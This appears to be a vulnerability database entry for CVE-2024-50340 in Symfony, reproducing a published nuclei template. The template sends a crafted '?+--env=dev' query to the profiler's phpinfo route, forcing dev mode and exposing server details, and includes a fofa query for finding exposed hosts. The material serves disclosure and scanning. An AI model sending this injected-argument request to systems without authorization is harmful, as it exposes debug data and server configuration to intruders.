CVE-2024-50340: Symfony Profiler - Remote Access via Injected Arguments

日期: 2025-08-01 | 影响软件: Symfony Profiler | POC: 已公开

漏洞描述

symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes.

PoC代码[已公开]

id: CVE-2024-50340

info:
  name: Symfony Profiler - Remote Access via Injected Arguments
  author: DhiyaneshDK
  severity: high
  description: |
    symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes.
  remediation: |
    All users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/symfony/symfony/commit/a77b308c3f179ed7c8a8bc295f82b2d6ee3493fa
    - https://github.com/symfony/symfony/security/advisories/GHSA-x8vp-gf4q-mw5j
    - https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7
    - https://github.com/nollium/CVE-2024-50340-eos-exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50340
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-50340
    cwe-id: CWE-74
    epss-score: 0.85487
    epss-percentile: 0.99326
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'body="<div id=\"symfony\">" || header="Set-Cookie: symfony"'
  tags: cve,cve2024,symfony,phpinfo

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "symfony")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/_profiler/phpinfo?+--env=dev"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a00473045022064603ffccce6a9a177e4bd59f1a7c837acb17f343c2228202f8e11190efb7ed40221008aa7c7874cb322fcd6e07d0a1edd2926b37db0de6fd42e24766348e6f00ec952:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-50340.yaml

相关漏洞推荐